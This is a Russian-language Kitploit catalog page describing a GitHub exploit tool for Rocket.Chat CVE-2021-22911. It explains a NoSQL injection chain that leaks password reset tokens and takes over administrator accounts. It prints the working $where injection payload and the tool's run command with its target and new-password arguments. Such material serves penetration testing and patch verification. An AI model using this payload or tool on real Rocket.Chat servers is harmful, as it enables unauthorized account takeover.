Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RocketChat-NoSQLi-Chain-CVE-2021-22911 — Автоматизированный эксплойт для NoSQL-инъекции в Rocket.Chat (CVE-2021-22911), который раскрывает токены сброса пароля и выполняет захват учетной записи без аутентификации. | Kitploit
Инструменты/GitHubGitHub/tenebrae93/rocketchat-nosqli-chain-cve-2021-22911
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubtenebrae93/rocketchat-nosqli-chain-cve-2021-22911

RocketChat-NoSQLi-Chain-CVE-2021-22911

Автоматизированный эксплойт для NoSQL-инъекции в Rocket.Chat (CVE-2021-22911), который раскрывает токены сброса пароля и выполняет захват учетной записи без аутентификации.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
16 месяцев назадЕщё не проверено

Rocket.Chat NoSQLi: Утечка токена и сброс пароля

Автоматизированный эксплойт для Rocket.Chat (и приложений на базе Meteor), который использует NoSQL-инъекцию через выражение $where для утечки токенов сброса пароля через исключения на стороне сервера. После утечки токена скрипт выполняет неаутентифицированный сброс пароля.

Обзор уязвимости

  1. Аутентификация: Скрипт аутентифицируется как обычный пользователь для получения доступа к конечной точке /api/v1/users.list.

  2. NoSQL-инъекция: Использует параметр query для внедрения JavaScript-выражения $where.

  3. Эксфильтрация данных: Используя оператор throw внутри инъекции, скрипт заставляет сервер вернуть ошибку «неперехваченное исключение», содержащую токен сброса пароля целевого пользователя.

  4. Захват учётной записи: Скрипт использует утекший токен для вызова resetPassword, изменяя пароль целевой учётной записи.

Использование

Предварительные требования

  • Python 3.x

  • библиотека requests

Bash

root@kitploit:~
pip install requests

Запуск

Bash

root@kitploit:~
python3 exploit.py --url http://<TARGET_IP>:3000\
                   -u <YOUR_USER>\
                   -p <YOUR_PASS>\
                   -a <TARGET_ADMIN_USER>\
                   -ap <NEW_ADMIN_PASSWORD>

Аргументы командной строки

Деталь цепочки эксплойта

Основой эксплойта является строка инъекции:

JavaScript

root@kitploit:~
{"$where":"this.username==='admin' && (()=>{ throw this.services.password.reset.token })()"}

При обработке сервером движок базы данных выполняет анонимную функцию, аварийно завершается на throw, и приложение перехватывает исключение, непреднамеренно передавая секретный токен обратно пользователю в JSON-ответе об ошибке.

Скачать инструмент
АргументДлинный флагОписание
-u--userВаше действительное имя пользователя или email для начальной аутентификации.
-p--passwordВаш действительный пароль.
-a--adminИмя пользователя учётной записи, которую нужно сбросить.
-ap--admin-passНовый пароль для учётной записи администратора.
--urlБазовый URL экземпляра Rocket.Chat.